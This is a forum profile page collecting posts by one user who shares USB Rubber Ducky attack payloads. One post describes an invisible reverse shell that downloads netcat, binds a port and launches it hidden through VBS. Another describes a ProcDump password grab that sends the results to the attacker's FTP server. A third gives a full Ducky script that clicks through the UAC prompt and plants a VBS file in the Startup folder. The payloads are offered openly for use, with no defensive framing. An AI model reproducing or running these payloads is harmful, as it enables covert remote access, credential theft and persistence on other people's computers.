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Everything posted by Dtpk

  1. Thanks sorry I took so long to reply but I glad you liked this. :D
  2. Hello everyone Dtpk here and well I did a thing using Netcat and the usb rubber ducky to make a invisible reverse shell in under a few seconds I didn't time it this time but if I had to guess its about 8 to 9 seconds maybe a little faster first it navigates to userprofile folder then it downloads unzip.exe from either you own drop box or mine if you chose not to change the code then it downloads netcat from its site extracts it from command line using unzip.exe then it makes a batch file to invoke netcat to open a port on 190 then we use vbs script to launch the batch file invisibly. Also I have a video that is a little more in depth if you wish to check that out. Net Cat Script.txt
  3. Video Instructions replace Ftp info in script with your own and then put ProcDump files in your ftp home directory. Ps: Tweak the delays and you may end up with exactly a 10 sec pass grab in my case it ended up 12 to 13 seconds due to longer delay before ALT y also to make it even faster remove some of the script that just cleans up the files afterwards it un-necessary. ---------------------------------------------------------------------------------------------------------------- Please note windows 10 pin 4 digit # passwords won't be picked up and sometimes regular ones wont either but every OS below 10 is fine. Get ProcDump here: " https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx " Get Ducky Script here: " https://drive.google.com/open?id=0B3crm3FU22teNnBjblduSlhxcTA "
  4. Well I don't know what happened I input everything as far as i'm aware correctly got ok across the board in cmd but somewhere it messed up for me the frog ascii art I tried as well as Kenny from southpark both came out kinda broke if I adjust notepads window somethings align but its still messed up on random lines if you can let me know if I was just a idiot and messed this up lol.
  5. You may have to change some delays and this was tested on windows 10. Ps: I know this is simple just didn't see anyone post about it and thought some of you guys might like this. More codes scripts and videos to come be sure to check me out on YouTube https://www.youtube.com/user/everythingdigital1 and my website http://everythingdigital1.com/ ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- DELAY 500 REM *** Bypass UAC *** GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 5500 ALT y DELAY 500 STRING cd \ ENTER STRING cd %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup ENTER REM *** Delete update vbs file if already exists *** STRING erase /Q update.vbs ENTER STRING copy con update.vbs ENTER STRING dim speechobject ENTER STRING set speechobject=createobject("sapi.spvoice") ENTER REM *** Change text in quotes to what you want computer to say *** STRING speechobject.speak "Hello user I am watching you" ENTER CONTROL z ENTER REM *** Exit *** STRING EXIT ENTER
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